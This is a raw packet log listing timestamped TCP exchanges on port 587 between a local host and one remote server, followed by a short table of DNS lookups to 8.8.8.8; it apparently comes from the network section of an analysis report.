Jan 14, 2021 08:02:32.406322002 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.416862011 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.416893959 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.416909933 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.416924000 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.417038918 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.417083979 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.425326109 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.425438881 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.425518990 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.425710917 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.462855101 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.462908983 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.462934971 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.462959051 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.463098049 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.463141918 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.463167906 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.463196993 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.463253975 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.463654041 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.580878019 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.580928087 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.580972910 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.582473040 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.582746983 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.596399069 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.607304096 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.607337952 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.607495070 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.607599020 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.615698099 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.615803957 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.615991116 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.617660046 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.620999098 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.653404951 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.653456926 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.653485060 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.653510094 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.653583050 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.653637886 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.653759003 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.653882027 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.653971910 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.654016018 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.656232119 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.656424999 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.772766113 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.772819042 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.772907019 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.772948027 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.772984982 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.773037910 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.773052931 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.773065090 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.773184061 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.773211002 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.773261070 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.773279905 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.797627926 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.797691107 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.797813892 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.797821999 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.797899008 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.797928095 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.797976971 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.798012018 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.799774885 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.806174994 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.806199074 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.806863070 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.806904078 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.810956955 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.811424971 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.811861038 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.811888933 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.811912060 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.811947107 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.813965082 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.843957901 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.843995094 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.844099998 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.844315052 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.844372034 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.844446898 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.846263885 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.846438885 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.846534014 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.847142935 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.963351965 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.963386059 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.963402987 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.963469982 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.963490963 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.963547945 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.963562012 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.963696957 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.963742018 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.963821888 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.988045931 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.988090992 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.988115072 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.988188028 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.988245010 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.989840984 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.989917040 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:32.997041941 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:32.997420073 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.001827002 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.002943039 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.003994942 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.004132032 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.034382105 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.034400940 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.034466982 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.034485102 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.034535885 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.034588099 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.034600019 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.034642935 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.034676075 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.034914017 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.034980059 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.036570072 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.036952019 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.037237883 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.038698912 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.153758049 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.153793097 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.153808117 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.153855085 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.153964043 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.153992891 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.154020071 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.154045105 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.178342104 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.178416967 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.178476095 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.178553104 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.178580999 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.178589106 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.178634882 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.179996967 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.180480003 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.187650919 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.187678099 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.188043118 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.193084002 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.194150925 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.194174051 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.194283962 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.194328070 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.224667072 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.224693060 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.224700928 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.224854946 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.225018978 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.227027893 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.227125883 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.228815079 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.228893042 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.344124079 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.344151974 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.344158888 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.344192982 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.344268084 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.344343901 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.344393969 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.368752956 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.368784904 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.368798018 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.368984938 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.370486975 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.370623112 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.378361940 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.384390116 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.384413958 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.384423018 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.384438038 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.384613991 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.414988041 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.415011883 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.415019035 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.415055037 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.415066957 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.417234898 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.417258978 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.417293072 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.419056892 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.534509897 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.534535885 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.534547091 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.534560919 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.559154034 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.559190989 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.559206963 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.559787989 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.560681105 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.574676991 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.574697971 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.574706078 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.574738979 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.574822903 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.574904919 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.574970007 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.574970961 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.574985027 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.574990988 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.575028896 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.575062990 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.575149059 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.674541950 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.674608946 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.674823999 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.674861908 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.675276041 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.675297976 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.675340891 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.675343990 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.765002012 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.765027046 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.765033960 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.765187979 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.765250921 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.765263081 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.765435934 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.864839077 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.864876032 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.864886999 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.864923000 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.864963055 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.865058899 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.865113974 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.865211964 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.865258932 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.865278959 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.865427017 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.865466118 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.865534067 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.865578890 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.865672112 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:33.878787994 CET	587	49836	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:33.924868107 CET	49836	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.055180073 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.055206060 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.055258036 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.055356026 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.055378914 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.055413961 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.055437088 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.055538893 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.055605888 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.055629015 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.055696964 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.055869102 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.055881977 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.055938005 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.055952072 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.055994034 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.056008101 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.056226015 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.056261063 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.056272984 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.056309938 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.056348085 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.056380033 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.056499004 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.056572914 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.056720972 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.245567083 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.245599985 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.245613098 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.245696068 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.245774031 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.245786905 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.245822906 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.245836020 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.245848894 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.246016979 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.246032000 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.246103048 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.246130943 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.246292114 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.246417046 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.246504068 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.246748924 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.248383999 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.248466969 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.435949087 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.435980082 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.435988903 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.436073065 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.436146975 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.436151981 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.436170101 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.436219931 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.436259031 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.436474085 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.436570883 CET	49837	587	192.168.2.3	199.193.7.228
Jan 14, 2021 08:02:34.438544989 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.438570023 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.438577890 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.438627005 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.438666105 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.438709021 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.438956022 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.626476049 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.626516104 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.626523972 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.626532078 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.626780033 CET	587	49837	199.193.7.228	192.168.2.3
Jan 14, 2021 08:02:34.970017910 CET	49837	587	192.168.2.3	199.193.7.228

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2021 07:59:17.569272041 CET	65110	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:17.617516994 CET	53	65110	8.8.8.8	192.168.2.3
Jan 14, 2021 07:59:18.408240080 CET	58361	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:18.456034899 CET	53	58361	8.8.8.8	192.168.2.3
Jan 14, 2021 07:59:19.455475092 CET	63492	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:19.506242037 CET	53	63492	8.8.8.8	192.168.2.3
Jan 14, 2021 07:59:21.099704981 CET	60831	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:21.150368929 CET	53	60831	8.8.8.8	192.168.2.3
Jan 14, 2021 07:59:22.205271959 CET	60100	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:22.336503029 CET	53	60100	8.8.8.8	192.168.2.3
Jan 14, 2021 07:59:23.258204937 CET	53195	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:23.314742088 CET	53	53195	8.8.8.8	192.168.2.3
Jan 14, 2021 07:59:24.204947948 CET	50141	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:24.255738020 CET	53	50141	8.8.8.8	192.168.2.3
Jan 14, 2021 07:59:25.102734089 CET	53023	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:25.150680065 CET	53	53023	8.8.8.8	192.168.2.3
Jan 14, 2021 07:59:26.072304010 CET	49563	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:27.069504023 CET	49563	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:27.991471052 CET	53	49563	8.8.8.8	192.168.2.3
Jan 14, 2021 07:59:28.874310970 CET	51352	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:28.922048092 CET	53	51352	8.8.8.8	192.168.2.3
Jan 14, 2021 07:59:29.666528940 CET	59349	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:29.714510918 CET	53	59349	8.8.8.8	192.168.2.3
Jan 14, 2021 07:59:31.317909002 CET	57084	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:31.365736961 CET	53	57084	8.8.8.8	192.168.2.3
Jan 14, 2021 07:59:33.247423887 CET	58823	53	192.168.2.3	8.8.8.8
Jan 14, 2021 07:59:33.295321941 CET	53	58823	8.8.8.8	192.168.2.3
